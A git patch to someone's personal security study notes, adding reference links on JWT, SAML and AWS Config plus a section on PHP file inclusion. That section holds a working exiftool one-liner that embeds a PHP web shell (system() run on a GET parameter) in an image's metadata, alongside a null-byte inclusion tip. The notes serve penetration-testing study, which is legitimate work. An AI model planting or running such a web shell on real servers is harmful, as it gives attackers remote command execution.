From 1c5bc70c0dee824210ccf55c415d4f385325e37e Mon Sep 17 00:00:00 2001
From: Andres Hermosilla <an2dres5m@gmail.com>
Date: Mon, 26 Jul 2021 13:58:00 -0700
Subject: [PATCH] Updates

---
 auth.md         |  2 +-
 aws.md          |  6 ++++++
 saml.md         |  5 ++++-
 security-php.md | 11 +++++++++++
 4 files changed, 22 insertions(+), 2 deletions(-)

diff --git a/auth.md b/auth.md
index 0ff6cf1..8d700ca 100644
--- a/auth.md
+++ b/auth.md
@@ -57,4 +57,4 @@ OpenID Connect does both.
 - https://www.theidentitycookbook.com/2016/10/protect-bearer-tokens-using-proof-of.html
 - https://connect2id.com/learn/token-binding
 - https://infosec.mozilla.org/guidelines/iam/openid_connect.html
-
+- https://www.pingidentity.com/en/company/blog/posts/2019/jwt-security-nobody-talks-about.html
diff --git a/aws.md b/aws.md
index 6ae9f48..104506c 100644
--- a/aws.md
+++ b/aws.md
@@ -137,6 +137,12 @@ Storing encryption keys in the cloud
 ## AWS Config
 - Run a set of checks against resources to ensure adherance to certain standards
 - $2 a rule
+- https://youtu.be/kErRv4YB_T4
+- https://www.youtube.com/watch?v=fBewaclMo2s
+- https://jupiterone.com/blog/we-turned-off-aws-config/
+- `AWS_REGION=us-west-1 aws configservice describe-config-rules`
+- List of AWS managed rules
+  - https://docs.aws.amazon.com/config/latest/developerguide/managed-rules-by-aws-config.html
 
 ## CloudTrail
 Think of it as the auditd of linux but for AWS
diff --git a/saml.md b/saml.md
index 39abddf..9d3e1d0 100644
--- a/saml.md
+++ b/saml.md
@@ -1,4 +1,7 @@
 - https://www.youtube.com/watch?v=SvppXbpv-5k
 - https://owasp.org/www-project-cheat-sheets/cheatsheets/SAML_Security_Cheat_Sheet.html
 - https://github.com/jch/saml
-- https://www.samltool.com/index.php
\ No newline at end of file
+- https://www.samltool.com/index.php
+- https://duo.com/blog/the-beer-drinkers-guide-to-saml
+- https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/
+- https://gravitational.com/blog/how-saml-authentication-works/
diff --git a/security-php.md b/security-php.md
index e26bd57..707f1e7 100644
--- a/security-php.md
+++ b/security-php.md
@@ -10,6 +10,17 @@
 - Don't forget about the null byte! `%00`
 - https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
 - https://upshell.wordpress.com/2011/06/11/new-vulnerabilities-to-access-files-in-php/
+- https://websec.io/2012/09/05/A-Silent-Threat-PHP-in-EXIF.html
+
+### Inclusion with Images
+Sometimes you may have an `include` but you can add arbitrary PHP files. There may however be a place to add images and you can embed php in an image which gets executed if the image is included.
+
+```
+exiftool -documentname='<?php echo system(isset($_GET["c"]) ? $_GET["c"] : "ls -lah"); ?>' profile.jpg
+```
+
+
+
 
 Sometimes PHP is so terribly configured you can inject your code into the inclusion. 
 Here is an example of how you can pass a `sleep(10);` into a possible `include` which